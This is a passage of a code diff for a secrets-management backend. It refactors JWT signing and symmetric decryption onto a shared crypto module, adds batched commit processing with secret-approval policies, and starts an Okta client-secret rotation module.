 import { BadRequestError, ForbiddenRequestError, NotFoundError, OidcAuthError } from "@app/lib/errors";
 import { OrgServiceActor } from "@app/lib/types";
 import { ActorType, AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
@@ -406,7 +406,7 @@ export const oidcConfigServiceFactory = ({
 
     const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
     const isUserCompleted = Boolean(user.isAccepted);
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.PROVIDER_TOKEN,
         userId: user.id,

backend/src/ee/services/pit/pit-service.ts

@@ -1,29 +1,52 @@
 /* eslint-disable no-await-in-loop */
 import { ForbiddenError } from "@casl/ability";
 
+import { Event, EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { ProjectPermissionCommitsActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission";
-import { NotFoundError } from "@app/lib/errors";
+import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
 import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type";
-import { ResourceType, TFolderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service";
+import { TFolderCommitDALFactory } from "@app/services/folder-commit/folder-commit-dal";
+import {
+  ResourceType,
+  TCommitResourceChangeDTO,
+  TFolderCommitServiceFactory
+} from "@app/services/folder-commit/folder-commit-service";
 import {
   isFolderCommitChange,
   isSecretCommitChange
 } from "@app/services/folder-commit-changes/folder-commit-changes-dal";
+import { TProjectDALFactory } from "@app/services/project/project-dal";
 import { TProjectEnvDALFactory } from "@app/services/project-env/project-env-dal";
 import { TSecretServiceFactory } from "@app/services/secret/secret-service";
+import { TProcessNewCommitRawDTO } from "@app/services/secret/secret-types";
 import { TSecretFolderDALFactory } from "@app/services/secret-folder/secret-folder-dal";
 import { TSecretFolderServiceFactory } from "@app/services/secret-folder/secret-folder-service";
+import { TSecretV2BridgeServiceFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-service";
+import { SecretOperations, SecretUpdateMode } from "@app/services/secret-v2-bridge/secret-v2-bridge-types";
 
 import { TPermissionServiceFactory } from "../permission/permission-service-types";
+import { TSecretApprovalPolicyServiceFactory } from "../secret-approval-policy/secret-approval-policy-service";
+import { TSecretApprovalRequestServiceFactory } from "../secret-approval-request/secret-approval-request-service";
 
 type TPitServiceFactoryDep = {
   folderCommitService: TFolderCommitServiceFactory;
   secretService: Pick<TSecretServiceFactory, "getSecretVersionsV2ByIds" | "getChangeVersions">;
-  folderService: Pick<TSecretFolderServiceFactory, "getFolderById" | "getFolderVersions">;
+  folderService: Pick<
+    TSecretFolderServiceFactory,
+    "getFolderById" | "getFolderVersions" | "createManyFolders" | "updateManyFolders" | "deleteManyFolders"
+  >;
   permissionService: Pick<TPermissionServiceFactory, "getProjectPermission">;
-  folderDAL: Pick<TSecretFolderDALFactory, "findSecretPathByFolderIds">;
+  folderDAL: Pick<TSecretFolderDALFactory, "findSecretPathByFolderIds" | "findBySecretPath">;
   projectEnvDAL: Pick<TProjectEnvDALFactory, "findOne">;
+  secretApprovalRequestService: Pick<
+    TSecretApprovalRequestServiceFactory,
+    "generateSecretApprovalRequest" | "generateSecretApprovalRequestV2Bridge"
+  >;
+  secretApprovalPolicyService: Pick<TSecretApprovalPolicyServiceFactory, "getSecretApprovalPolicy">;
+  projectDAL: Pick<TProjectDALFactory, "checkProjectUpgradeStatus" | "findProjectBySlug" | "findById">;
+  secretV2BridgeService: TSecretV2BridgeServiceFactory;
+  folderCommitDAL: Pick<TFolderCommitDALFactory, "transaction">;
 };
 
 export type TPitServiceFactory = ReturnType<typeof pitServiceFactory>;
@@ -34,7 +57,12 @@ export const pitServiceFactory = ({
   folderService,
   permissionService,
   folderDAL,
-  projectEnvDAL
+  projectEnvDAL,
+  secretApprovalRequestService,
+  secretApprovalPolicyService,
+  projectDAL,
+  secretV2BridgeService,
+  folderCommitDAL
 }: TPitServiceFactoryDep) => {
   const getCommitsCount = async ({
     actor,
@@ -471,6 +499,347 @@ export const pitServiceFactory = ({
     });
   };
 
+  const processNewCommitRaw = async ({
+    actorId,
+    projectId,
+    environment,
+    actor,
+    actorOrgId,
+    actorAuthMethod,
+    secretPath,
+    message,
+    changes = {
+      secrets: {
+        create: [],
+        update: [],
+        delete: []
+      },
+      folders: {
+        create: [],
+        update: [],
+        delete: []
+      }
+    }
+  }: {
+    actorId: string;
+    projectId: string;
+    environment: string;
+    actor: ActorType;
+    actorOrgId: string;
+    actorAuthMethod: ActorAuthMethod;
+    secretPath: string;
+    message: string;
+    changes: TProcessNewCommitRawDTO;
+  }) => {
+    const policy =
+      actor === ActorType.USER
+        ? await secretApprovalPolicyService.getSecretApprovalPolicy(projectId, environment, secretPath)
+        : undefined;
+    const secretMutationEvents: Event[] = [];
+
+    const project = await projectDAL.findById(projectId);
+    if (project.enforceCapitalization) {
+      const caseViolatingSecretKeys = [
+        // Check create operations
+        ...(changes.secrets?.create
+          ?.filter((sec) => sec.secretKey !== sec.secretKey.toUpperCase())
+          .map((sec) => sec.secretKey) ?? []),
+
+        // Check update operations
+        ...(changes.secrets?.update
+          ?.filter((sec) => sec.newSecretName && sec.newSecretName !== sec.newSecretName.toUpperCase())
+          .map((sec) => sec.secretKey) ?? [])
+      ];
+
+      if (caseViolatingSecretKeys.length) {
+        throw new BadRequestError({
+          message: `Secret names must be in UPPERCASE per project requirements: ${caseViolatingSecretKeys.join(
+            ", "
+          )}. You can disable this requirement in project settings`
+        });
+      }
+    }
+
+    const response = await folderCommitDAL.transaction(async (trx) => {
+      const targetFolder = await folderDAL.findBySecretPath(projectId, environment, secretPath, trx);
+      if (!targetFolder)
+        throw new NotFoundError({
+          message: `Folder with path '${secretPath}' in environment with slug '${environment}' not found`,
+          name: "CreateManySecret"
+        });
+      const commitChanges: TCommitResourceChangeDTO[] = [];
+      const folderChanges: { create: string[]; update: string[]; delete: string[] } = {
+        create: [],
+        update: [],
+        delete: []
+      };
+
+      if ((changes.folders?.create?.length ?? 0) > 0) {
+        const createdFolders = await folderService.createManyFolders({
+          projectId,
+          actor,
+          actorId,
+          actorOrgId,
+          actorAuthMethod,
+          folders:
+            changes.folders?.create?.map((folder) => ({
+              name: folder.folderName,
+              environment,
+              path: secretPath,
+              description: folder.description
+            })) ?? [],
+          tx: trx,
+          commitChanges
+        });
+        const newFolderEvents = createdFolders.folders.map(
+          (folder) =>
+            ({
+              type: EventType.CREATE_FOLDER,
+              metadata: {
+                environment,
+                folderId: folder.id,
+                folderName: folder.name,
+                folderPath: secretPath,
+                ...(folder.description ? { description: folder.description } : {})
+              }
+            }) as Event
+        );
+        secretMutationEvents.push(...newFolderEvents);
+        folderChanges.create.push(...createdFolders.folders.map((folder) => folder.id));
+      }
+
+      if ((changes.folders?.update?.length ?? 0) > 0) {
+        const updatedFolders = await folderService.updateManyFolders({
+          projectId,
+          actor,
+          actorId,
+          actorOrgId,
+          actorAuthMethod,
+          folders:
+            changes.folders?.update?.map((folder) => ({
+              environment,
+              path: secretPath,
+              id: folder.id,
+              name: folder.folderName,
+              description: folder.description
+            })) ?? [],
+          tx: trx,
+          commitChanges
+        });
+
+        const updatedFolderEvents = updatedFolders.newFolders.map(
+          (folder) =>
+            ({
+              type: EventType.UPDATE_FOLDER,
+              metadata: {
+                environment,
+                folderId: folder.id,
+                folderPath: secretPath,
+                newFolderName: folder.name,
+                newFolderDescription: folder.description
+              }
+            }) as Event
+        );
+        secretMutationEvents.push(...updatedFolderEvents);
+        folderChanges.update.push(...updatedFolders.newFolders.map((folder) => folder.id));
+      }
+
+      if ((changes.folders?.delete?.length ?? 0) > 0) {
+        const deletedFolders = await folderService.deleteManyFolders({
+          projectId,
+          actor,
+          actorId,
+          actorOrgId,
+          actorAuthMethod,
+          folders:
+            changes.folders?.delete?.map((folder) => ({
+              environment,
+              path: secretPath,
+              idOrName: folder.id
+            })) ?? [],
+          tx: trx,
+          commitChanges
+        });
+        const deletedFolderEvents = deletedFolders.folders.map(
+          (folder) =>
+            ({
+              type: EventType.DELETE_FOLDER,
+              metadata: {
+                environment,
+                folderId: folder.id,
+                folderPath: secretPath,
+                folderName: folder.name
+              }
+            }) as Event
+        );
+        secretMutationEvents.push(...deletedFolderEvents);
+        folderChanges.delete.push(...deletedFolders.folders.map((folder) => folder.id));
+      }
+
+      if (policy) {
+        if (
+          (changes.secrets?.create?.length ?? 0) > 0 ||
+          (changes.secrets?.update?.length ?? 0) > 0 ||
+          (changes.secrets?.delete?.length ?? 0) > 0
+        ) {
+          const approval = await secretApprovalRequestService.generateSecretApprovalRequestV2Bridge({
+            policy,
+            secretPath,
+            environment,
+            projectId,
+            actor,
+            actorId,
+            actorOrgId,
+            actorAuthMethod,
+            data: {
+              [SecretOperations.Create]:
+                changes.secrets?.create?.map((el) => ({
+                  tagIds: el.tagIds,
+                  secretValue: el.secretValue,
+                  secretComment: el.secretComment,
+                  metadata: el.metadata,
+                  skipMultilineEncoding: el.skipMultilineEncoding,
+                  secretKey: el.secretKey,
+                  secretMetadata: el.secretMetadata
+                })) ?? [],
+              [SecretOperations.Update]:
+                changes.secrets?.update?.map((el) => ({
+                  tagIds: el.tagIds,
+                  newSecretName: el.newSecretName,
+                  secretValue: el.secretValue,
+                  secretComment: el.secretComment,
+                  metadata: el.metadata,
+                  skipMultilineEncoding: el.skipMultilineEncoding,
+                  secretKey: el.secretKey,
+                  secretMetadata: el.secretMetadata
+                })) ?? [],
+              [SecretOperations.Delete]:
+                changes.secrets?.delete?.map((el) => ({
+                  secretKey: el.secretKey
+                })) ?? []
+            }
+          });
+          return {
+            approvalId: approval.id,
+            folderChanges,
+            secretMutationEvents
+          };
+        }
+        return {
+          folderChanges,
+          secretMutationEvents
+        };
+      }
+
+      if ((changes.secrets?.create?.length ?? 0) > 0) {
+        const newSecrets = await secretV2BridgeService.createManySecret({
+          secretPath,
+          environment,
+          projectId,
+          actorAuthMethod,
+          actorOrgId,
+          actor,
+          actorId,
+          secrets: changes.secrets?.create ?? [],
+          tx: trx,
+          commitChanges
+        });
+        secretMutationEvents.push({
+          type: EventType.CREATE_SECRETS,
+          metadata: {
+            environment,
+            secretPath,
+            secrets: newSecrets.map((secret) => ({
+              secretId: secret.id,
+              secretKey: secret.secretKey,
+              secretVersion: secret.version
+            }))
+          }
+        });
+      }
+      if ((changes.secrets?.update?.length ?? 0) > 0) {
+        const updatedSecrets = await secretV2BridgeService.updateManySecret({
+          secretPath,
+          environment,
+          projectId,
+          actorAuthMethod,
+          actorOrgId,
+          actor,
+          actorId,
+          secrets: changes.secrets?.update ?? [],
+          mode: SecretUpdateMode.FailOnNotFound,
+          tx: trx,
+          commitChanges
+        });
+        secretMutationEvents.push({
+          type: EventType.UPDATE_SECRETS,
+          metadata: {
+            environment,
+            secretPath,
+            secrets: updatedSecrets.map((secret) => ({
+              secretId: secret.id,
+              secretKey: secret.secretKey,
+              secretVersion: secret.version
+            }))
+          }
+        });
+      }
+      if ((changes.secrets?.delete?.length ?? 0) > 0) {
+        const deletedSecrets = await secretV2BridgeService.deleteManySecret({
+          secretPath,
+          environment,
+          projectId,
+          actorAuthMethod,
+          actorOrgId,
+          actor,
+          actorId,
+          secrets: changes.secrets?.delete ?? [],
+          tx: trx,
+          commitChanges
+        });
+        secretMutationEvents.push({
+          type: EventType.DELETE_SECRETS,
+          metadata: {
+            environment,
+            secretPath,
+            secrets: deletedSecrets.map((secret) => ({
+              secretId: secret.id,
+              secretKey: secret.secretKey,
+              secretVersion: secret.version
+            }))
+          }
+        });
+      }
+      if (commitChanges?.length > 0) {
+        const commit = await folderCommitService.createCommit(
+          {
+            actor: {
+              type: actor || ActorType.PLATFORM,
+              metadata: {
+                id: actorId
+              }
+            },
+            message,
+            folderId: targetFolder.id,
+            changes: commitChanges
+          },
+          trx
+        );
+        return {
+          folderChanges,
+          commitId: commit?.id,
+          secretMutationEvents
+        };
+      }
+      return {
+        folderChanges,
+        secretMutationEvents
+      };
+    });
+
+    return response;
+  };
+
   return {
     getCommitsCount,
     getCommitsForFolder,
@@ -478,6 +847,7 @@ export const pitServiceFactory = ({
     compareCommitChanges,
     rollbackToCommit,
     revertCommit,
-    getFolderStateAtCommit
+    getFolderStateAtCommit,
+    processNewCommitRaw
   };
 };

backend/src/ee/services/saml-config/saml-config-service.ts

@@ -1,8 +1,8 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 
 import { OrgMembershipStatus, TableName, TSamlConfigs, TSamlConfigsUpdate, TUsers } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { AuthTokenType } from "@app/services/auth/auth-type";
 import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service";
@@ -311,13 +311,6 @@ export const samlConfigServiceFactory = ({
       });
     } else {
       const plan = await licenseService.getPlan(orgId);
-      if (plan?.slug !== "enterprise" && plan?.memberLimit && plan.membersUsed >= plan.memberLimit) {
-        // limit imposed on number of members allowed / number of members used exceeds the number of members allowed
-        throw new BadRequestError({
-          message: "Failed to create new member via SAML due to member limit reached. Upgrade plan to add more members."
-        });
-      }
-
       if (plan?.slug !== "enterprise" && plan?.identityLimit && plan.identitiesUsed >= plan.identityLimit) {
         // limit imposed on number of identities allowed / number of identities used exceeds the number of identities allowed
         throw new BadRequestError({
@@ -417,9 +410,9 @@ export const samlConfigServiceFactory = ({
     }
     await licenseService.updateSubscriptionOrgMemberCount(organization.id);
 
-    const isUserCompleted = Boolean(user.isAccepted);
+    const isUserCompleted = Boolean(user.isAccepted && user.isEmailVerified);
     const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.PROVIDER_TOKEN,
         userId: user.id,

backend/src/ee/services/scim/scim-service.ts

@@ -1,6 +1,5 @@
 import { ForbiddenError } from "@casl/ability";
 import slugify from "@sindresorhus/slugify";
-import jwt from "jsonwebtoken";
 import { scimPatch } from "scim-patch";
 
 import { OrgMembershipRole, OrgMembershipStatus, TableName, TGroups, TOrgMemberships, TUsers } from "@app/db/schemas";
@@ -9,6 +8,7 @@ import { addUsersToGroupByUserIds, removeUsersFromGroupByUserIds } from "@app/ee
 import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-group-membership-dal";
 import { TScimDALFactory } from "@app/ee/services/scim/scim-dal";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, NotFoundError, ScimRequestError, UnauthorizedError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { AuthTokenType } from "@app/services/auth/auth-type";
@@ -137,7 +137,7 @@ export const scimServiceFactory = ({
       ttlDays
     });
 
-    const scimToken = jwt.sign(
+    const scimToken = crypto.jwt().sign(
       {
         scimTokenId: scimTokenData.id,
         authTokenType: AuthTokenType.SCIM_TOKEN

backend/src/ee/services/secret-approval-policy/secret-approval-policy-service.ts

@@ -55,6 +55,26 @@ export const secretApprovalPolicyServiceFactory = ({
   licenseService,
   secretApprovalRequestDAL
 }: TSecretApprovalPolicyServiceFactoryDep) => {
+  const $policyExists = async ({
+    envId,
+    secretPath,
+    policyId
+  }: {
+    envId: string;
+    secretPath: string;
+    policyId?: string;
+  }) => {
+    const policy = await secretApprovalPolicyDAL
+      .findOne({
+        envId,
+        secretPath,
+        deletedAt: null
+      })
+      .catch(() => null);
+
+    return policyId ? policy && policy.id !== policyId : Boolean(policy);
+  };
+
   const createSecretApprovalPolicy = async ({
     name,
     actor,
@@ -106,10 +126,17 @@ export const secretApprovalPolicyServiceFactory = ({
     }
 
     const env = await projectEnvDAL.findOne({ slug: environment, projectId });
-    if (!env)
+    if (!env) {
       throw new NotFoundError({
         message: `Environment with slug '${environment}' not found in project with ID ${projectId}`
       });
+    }
+
+    if (await $policyExists({ envId: env.id, secretPath })) {
+      throw new BadRequestError({
+        message: `A policy for secret path '${secretPath}' already exists in environment '${environment}'`
+      });
+    }
 
     let groupBypassers: string[] = [];
     let bypasserUserIds: string[] = [];
@@ -260,6 +287,18 @@ export const secretApprovalPolicyServiceFactory = ({
       });
     }
 
+    if (
+      await $policyExists({
+        envId: secretApprovalPolicy.envId,
+        secretPath: secretPath || secretApprovalPolicy.secretPath,
+        policyId: secretApprovalPolicy.id
+      })
+    ) {
+      throw new BadRequestError({
+        message: `A policy for secret path '${secretPath}' already exists in environment '${secretApprovalPolicy.environment.slug}'`
+      });
+    }
+
     const { permission } = await permissionService.getProjectPermission({
       actor,
       actorId,

backend/src/ee/services/secret-approval-policy/secret-approval-policy-types.ts

@@ -4,7 +4,7 @@ import { ApproverType, BypasserType } from "../access-approval-policy/access-app
 
 export type TCreateSapDTO = {
   approvals: number;
-  secretPath?: string | null;
+  secretPath: string;
   environment: string;
   approvers: ({ type: ApproverType.Group; id: string } | { type: ApproverType.User; id?: string; username?: string })[];
   bypassers?: (
@@ -20,7 +20,7 @@ export type TCreateSapDTO = {
 export type TUpdateSapDTO = {
   secretPolicyId: string;
   approvals?: number;
-  secretPath?: string | null;
+  secretPath?: string;
   approvers: ({ type: ApproverType.Group; id: string } | { type: ApproverType.User; id?: string; username?: string })[];
   bypassers?: (
     | { type: BypasserType.Group; id: string }

backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts

@@ -45,7 +45,7 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
         `${TableName.SecretApprovalRequest}.statusChangedByUserId`,
         `statusChangedByUser.id`
       )
-      .join<TUsers>(
+      .leftJoin<TUsers>(
         db(TableName.Users).as("committerUser"),
         `${TableName.SecretApprovalRequest}.committerUserId`,
         `committerUser.id`
@@ -173,13 +173,15 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
                 username: el.statusChangedByUserUsername
               }
             : undefined,
-          committerUser: {
-            userId: el.committerUserId,
-            email: el.committerUserEmail,
-            firstName: el.committerUserFirstName,
-            lastName: el.committerUserLastName,
-            username: el.committerUserUsername
-          },
+          committerUser: el.committerUserId
+            ? {
+                userId: el.committerUserId,
+                email: el.committerUserEmail,
+                firstName: el.committerUserFirstName,
+                lastName: el.committerUserLastName,
+                username: el.committerUserUsername
+              }
+            : null,
           policy: {
             id: el.policyId,
             name: el.policyName,
@@ -377,7 +379,7 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
           `${TableName.SecretApprovalPolicyBypasser}.bypasserGroupId`,
           `bypasserUserGroupMembership.groupId`
         )
-        .join<TUsers>(
+        .leftJoin<TUsers>(
           db(TableName.Users).as("committerUser"),
           `${TableName.SecretApprovalRequest}.committerUserId`,
           `committerUser.id`
@@ -488,13 +490,15 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
             enforcementLevel: el.policyEnforcementLevel,
             allowedSelfApprovals: el.policyAllowedSelfApprovals
           },
-          committerUser: {
-            userId: el.committerUserId,
-            email: el.committerUserEmail,
-            firstName: el.committerUserFirstName,
-            lastName: el.committerUserLastName,
-            username: el.committerUserUsername
-          }
+          committerUser: el.committerUserId
+            ? {
+                userId: el.committerUserId,
+                email: el.committerUserEmail,
+                firstName: el.committerUserFirstName,
+                lastName: el.committerUserLastName,
+                username: el.committerUserUsername
+              }
+            : null
         }),
         childrenMapper: [
           {
@@ -581,7 +585,7 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
           `${TableName.SecretApprovalPolicyBypasser}.bypasserGroupId`,
           `bypasserUserGroupMembership.groupId`
         )
-        .join<TUsers>(
+        .leftJoin<TUsers>(
           db(TableName.Users).as("committerUser"),
           `${TableName.SecretApprovalRequest}.committerUserId`,
           `committerUser.id`
@@ -693,13 +697,15 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
             enforcementLevel: el.policyEnforcementLevel,
             allowedSelfApprovals: el.policyAllowedSelfApprovals
           },
-          committerUser: {
-            userId: el.committerUserId,
-            email: el.committerUserEmail,
-            firstName: el.committerUserFirstName,
-            lastName: el.committerUserLastName,
-            username: el.committerUserUsername
-          }
+          committerUser: el.committerUserId
+            ? {
+                userId: el.committerUserId,
+                email: el.committerUserEmail,
+                firstName: el.committerUserFirstName,
+                lastName: el.committerUserLastName,
+                username: el.committerUserUsername
+              }
+            : null
         }),
         childrenMapper: [
           {

backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts

@@ -1,5 +1,6 @@
 /* eslint-disable no-nested-ternary */
 import { ForbiddenError, subject } from "@casl/ability";
+import { Knex } from "knex";
 
 import {
   ProjectMembershipRole,
@@ -12,7 +13,7 @@ import {
 } from "@app/db/schemas";
 import { Event, EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { getConfig } from "@app/lib/config/env";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { groupBy, pick, unique } from "@app/lib/fn";
 import { setKnexStringValue } from "@app/lib/knex";
@@ -820,11 +821,12 @@ export const secretApprovalRequestServiceFactory = ({
                 type: SecretType.Shared,
                 references: botKey
                   ? getAllNestedSecretReferences(
-                      decryptSymmetric128BitHexKeyUTF8({
+                      crypto.encryption().symmetric().decrypt({
                         ciphertext: el.secretValueCiphertext,
                         iv: el.secretValueIV,
                         tag: el.secretValueTag,
-                        key: botKey
+                        key: botKey,
+                        keySize: SymmetricKeySize.Bits128
                       })
                     )
                   : undefined
@@ -865,11 +867,12 @@ export const secretApprovalRequestServiceFactory = ({
                   ]),
                   references: botKey
                     ? getAllNestedSecretReferences(
-                        decryptSymmetric128BitHexKeyUTF8({
+                        crypto.encryption().symmetric().decrypt({
                           ciphertext: el.secretValueCiphertext,
                           iv: el.secretValueIV,
                           tag: el.secretValueTag,
-                          key: botKey
+                          key: botKey,
+                          keySize: SymmetricKeySize.Bits128
                         })
                       )
                     : undefined
@@ -1320,7 +1323,7 @@ export const secretApprovalRequestServiceFactory = ({
     });
 
     const env = await projectEnvDAL.findOne({ id: policy.envId });
-    const user = await userDAL.findById(secretApprovalRequest.committerUserId);
+    const user = await userDAL.findById(actorId);
 
     await triggerWorkflowIntegrationNotification({
       input: {
@@ -1366,8 +1369,9 @@ export const secretApprovalRequestServiceFactory = ({
     policy,
     projectId,
     secretPath,
-    environment
-  }: TGenerateSecretApprovalRequestV2BridgeDTO) => {
+    environment,
+    trx: providedTx
+  }: TGenerateSecretApprovalRequestV2BridgeDTO & { trx?: Knex }) => {
     if (actor === ActorType.SERVICE || actor === ActorType.Machine)
       throw new BadRequestError({ message: "Cannot use service token or machine token over protected branches" });
 
@@ -1593,7 +1597,7 @@ export const secretApprovalRequestServiceFactory = ({
       );
     });
 
-    const secretApprovalRequest = await secretApprovalRequestDAL.transaction(async (tx) => {
+    const executeApprovalRequestCreation = async (tx: Knex) => {
       const doc = await secretApprovalRequestDAL.create(
         {
           folderId,
@@ -1655,9 +1659,13 @@ export const secretApprovalRequestServiceFactory = ({
       }
 
       return { ...doc, commits: approvalCommits };
-    });
+    };
 
-    const user = await userDAL.findById(secretApprovalRequest.committerUserId);
+    const secretApprovalRequest = providedTx
+      ? await executeApprovalRequestCreation(providedTx)
+      : await secretApprovalRequestDAL.transaction(executeApprovalRequestCreation);
+
+    const user = await userDAL.findById(actorId);
     const env = await projectEnvDAL.findOne({ id: policy.envId });
 
     await triggerWorkflowIntegrationNotification({

backend/src/ee/services/secret-replication/secret-replication-service.ts

@@ -3,7 +3,7 @@ import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-app
 import { TSecretApprovalRequestDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-dal";
 import { TSecretApprovalRequestSecretDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-secret-dal";
 import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { NotFoundError } from "@app/lib/errors";
 import { groupBy, unique } from "@app/lib/fn";
 import { logger } from "@app/lib/logger";
@@ -100,18 +100,20 @@ const getReplicationKeyLockPrefix = (projectId: string, environmentSlug: string,
 export const getReplicationFolderName = (importId: string) => `${ReservedFolders.SecretReplication}${importId}`;
 
 const getDecryptedKeyValue = (key: string, secret: TSecrets) => {
-  const secretKey = decryptSymmetric128BitHexKeyUTF8({
+  const secretKey = crypto.encryption().symmetric().decrypt({
     ciphertext: secret.secretKeyCiphertext,
     iv: secret.secretKeyIV,
     tag: secret.secretKeyTag,
-    key
+    key,
+    keySize: SymmetricKeySize.Bits128
   });
 
-  const secretValue = decryptSymmetric128BitHexKeyUTF8({
+  const secretValue = crypto.encryption().symmetric().decrypt({
     ciphertext: secret.secretValueCiphertext,
     iv: secret.secretValueIV,
     tag: secret.secretValueTag,
-    key
+    key,
+    keySize: SymmetricKeySize.Bits128
   });
   return { key: secretKey, value: secretValue };
 };

backend/src/ee/services/secret-rotation-v2/okta-client-secret/index.ts

@@ -0,0 +1,3 @@
+export * from "./okta-client-secret-rotation-constants";
+export * from "./okta-client-secret-rotation-schemas";
+export * from "./okta-client-secret-rotation-types";

backend/src/ee/services/secret-rotation-v2/okta-client-secret/okta-client-secret-rotation-constants.ts

@@ -0,0 +1,15 @@
+import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums";
+import { TSecretRotationV2ListItem } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types";
+import { AppConnection } from "@app/services/app-connection/app-connection-enums";
+
+export const OKTA_CLIENT_SECRET_ROTATION_LIST_OPTION: TSecretRotationV2ListItem = {
+  name: "Okta Client Secret",
+  type: SecretRotation.OktaClientSecret,
+  connection: AppConnection.Okta,
+  template: {
+    secretsMapping: {
+      clientId: "OKTA_CLIENT_ID",
+      clientSecret: "OKTA_CLIENT_SECRET"
+    }
+  }
+};

backend/src/ee/services/secret-rotation-v2/okta-client-secret/okta-client-secret-rotation-fns.ts

@@ -0,0 +1,273 @@
+/* eslint-disable no-await-in-loop */
+import { AxiosError } from "axios";
+
+import {
+  TRotationFactory,
+  TRotationFactoryGetSecretsPayload,
+  TRotationFactoryIssueCredentials,
+  TRotationFactoryRevokeCredentials,
+  TRotationFactoryRotateCredentials
+} from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-types";
+import { request } from "@app/lib/config/request";
+import { delay as delayMs } from "@app/lib/delay";
+import { BadRequestError } from "@app/lib/errors";
+import { getOktaInstanceUrl } from "@app/services/app-connection/okta";
+
+import {
+  TOktaClientSecret,
+  TOktaClientSecretRotationGeneratedCredentials,
+  TOktaClientSecretRotationWithConnection
+} from "./okta-client-secret-rotation-types";
+
+type OktaErrorResponse = { errorCode: string; errorSummary: string; errorCauses?: { errorSummary: string }[] };
+
+const isOktaErrorResponse = (data: unknown): data is OktaErrorResponse => {
+  return (
+    typeof data === "object" &&
+    data !== null &&
+    "errorSummary" in data &&
+    typeof (data as OktaErrorResponse).errorSummary === "string"
+  );
+};
+
+const createErrorMessage = (error: unknown) => {
+  if (error instanceof AxiosError) {
+    if (error.response?.data && isOktaErrorResponse(error.response.data)) {
+      const oktaError = error.response.data;
+      if (oktaError.errorCauses && oktaError.errorCauses.length > 0) {
+        return oktaError.errorCauses[0].errorSummary;
+      }
+      return oktaError.errorSummary;
+    }
+    if (error.message) {
+      return error.message;
+    }
+  }
+  return "Unknown error";
+};
+
+// Delay between each revocation call in revokeCredentials
+const DELAY_MS = 1000;
+
+export const oktaClientSecretRotationFactory: TRotationFactory<
+  TOktaClientSecretRotationWithConnection,
+  TOktaClientSecretRotationGeneratedCredentials
+> = (secretRotation) => {
+  const {
+    connection,
+    parameters: { clientId },
+    secretsMapping
+  } = secretRotation;
+
+  /**
+   * Creates a new client secret for the Okta app.
+   */
+  const $rotateClientSecret = async () => {
+    const instanceUrl = await getOktaInstanceUrl(connection);
+
+    try {
+      const { data } = await request.post<TOktaClientSecret>(
+        `${instanceUrl}/api/v1/apps/${clientId}/credentials/secrets`,
+        {},
+        {
+          headers: {
+            Accept: "application/json",
+            Authorization: `SSWS ${connection.credentials.apiToken}`
+          }
+        }
+      );
+
+      if (!data.client_secret || !data.id) {
+        throw new Error("Invalid response from Okta: missing 'client_secret' or secret 'id'.");
+      }
+
+      return {
+        clientSecret: data.client_secret,
+        secretId: data.id,
+        clientId
+      };
+    } catch (error: unknown) {
+      if (
+        error instanceof AxiosError &&
+        error.response?.data &&
+        isOktaErrorResponse(error.response.data) &&
+        error.response.data.errorCode === "E0000001"
+      ) {
+        // Okta has a maximum of 2 secrets per app, thus we must warn the users in case they already have 2
+        throw new BadRequestError({
+          message: `Failed to add client secret to Okta app ${clientId}: You must have only a single secret for the Okta app prior to creating this secret rotation.`
+        });
+      }
+
+      throw new BadRequestError({
+        message: `Failed to add client secret to Okta app ${clientId}: ${createErrorMessage(error)}`
+      });
+    }
+  };
+
+  /**
+   * List client secrets.
+   */
+  const $listClientSecrets = async () => {
+    const instanceUrl = await getOktaInstanceUrl(connection);
+
+    try {
+      const { data } = await request.get<TOktaClientSecret[]>(
+        `${instanceUrl}/api/v1/apps/${clientId}/credentials/secrets`,
+        {
+          headers: {
+            Accept: "application/json",
+            Authorization: `SSWS ${connection.credentials.apiToken}`
+          }
+        }
+      );
+
+      return data;
+    } catch (error: unknown) {
+      throw new BadRequestError({
+        message: `Failed to list client secrets for Okta app ${clientId}: ${createErrorMessage(error)}`
+      });
+    }
+  };
+
+  /**
+   * Checks if a credential with the given secretId exists.
